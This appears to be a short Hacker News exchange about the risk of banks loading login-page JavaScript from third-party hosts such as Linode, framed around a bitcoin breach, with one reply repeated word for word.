[quote]
The bitcoin breach seems analogous to Bank of America storing your account information on Linode and trusting it as the Real Data. Does that make sense?
[/quote]
//reply to tomg, but seem HN stops nested replies beyond a certain level
At the end of day you can have millions of dollar of security, auditing, PCI compliance tests passing, developers that celebrate every Friday that everything is secure, data is hosted on premise etc... But if you leave the login page javascript to a third party hosted on Linode then you might as well be BoA storing your data on a mySQL linode instance. So in a nutshell it kind of undermines the work you guys do.
That's very true, and TBH I'm a bit surprised these banks are allowing that. IME doing frontend code for banks is that they're very strict on third party libs, even ones hosted by the bank itself, right down to only approving certain versions of the lib.
//reply to tomg, but seem HN stops nested replies beyond a certain level
At the end of day you can have millions of dollar of security, auditing, PCI compliance tests passing, developers that celebrate every Friday that everything is secure, data is hosted on premise etc... But if you leave the login page javascript to a third party hosted on Linode then you might as well be BoA storing your data on a mySQL linode instance. So in a nutshell it kind of undermines the work you guys do.